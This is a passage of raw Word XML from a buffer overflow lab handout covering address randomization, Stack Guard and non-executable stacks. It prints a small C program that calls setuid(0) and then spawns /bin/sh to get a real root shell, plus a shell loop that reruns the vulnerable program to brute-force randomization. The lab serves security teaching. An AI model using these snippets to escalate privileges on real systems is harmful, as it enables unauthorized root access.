          <w:spacing w:val="34"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="34"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="34"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>root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To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>solve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="34"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>problem,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>you can run the following program to turn the real user id to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. This way, you will have a real </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>process,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powerful.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="162"/>
        <w:ind w:left="421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main()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="421"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="683"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>setuid(0);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="104"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>system("/bin/sh");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="421"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="697" w:val="left" w:leader="none"/>
          <w:tab w:pos="698" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="105" w:after="0"/>
        <w:ind w:left="697" w:right="0" w:hanging="538"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Randomization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="160" w:right="439"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Now, we turn on the Ubuntu’s address randomization. We run the same attack developed in Task 1. Can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>you get a shell?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>If not, what is the problem?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>How does the address randomization make your attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>difficult? You should describe your observation and explanation in your lab report. You can use the following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>instructions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turn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randomization:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="196"/>
        <w:ind w:left="421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su</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="21"/>
        <w:ind w:left="683"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>Password: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(enter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root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password)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="42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/sbin/sysctl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-w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kernel.randomize_va_space=2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="171"/>
        <w:ind w:left="160" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If running the vulnerable code once does not get you the root shell, how about running it for many</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>times?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="30"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>./stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-43"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>in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following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="30"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>loop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="34"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>see</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="30"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="30"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>happen.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="30"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="30"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is designed properly, you should be able to get the root shell after a while. You can modify your exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(i.e.,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reduce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wait).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="197"/>
        <w:ind w:left="421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sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>"while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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>./stack;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>done;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="697" w:val="left" w:leader="none"/>
          <w:tab w:pos="698" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="697" w:right="0" w:hanging="538"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Guard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="160" w:right="439"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Before working on this task, remember to turn off the address randomization first, or you will not know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protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>helps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>achieve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protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In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previous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tasks,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disabled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“Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Guard”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mechanism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GCC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compiling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>programs. In this task, you may consider repeating task 1 in the presence of Stack Guard. To do that, you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should compile the program without the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-fno-stack-protector’ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>option. For this task, you will recompile the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>program,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>stack.c,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GCC’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Guard,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>again,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report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observations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>You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report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messages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observe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="2"/>
        <w:ind w:left="160" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both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GCC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4.3.3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newer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>versions,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Guard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enabled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default.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Guard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switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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before.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>earlier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>versions,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disabled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default.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13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53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>older</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>GCC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>version,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disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Guard.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697" w:val="left" w:leader="none"/>
          <w:tab w:pos="698" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="697" w:right="0" w:hanging="538"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Non-executable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="160" w:right="439"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Before working on this task, remember to turn off the address randomization first, or you will not know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protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>helps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>achieve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protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="159" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both"/>
      </w:pP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3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>previous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tasks,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intentionally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>stacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
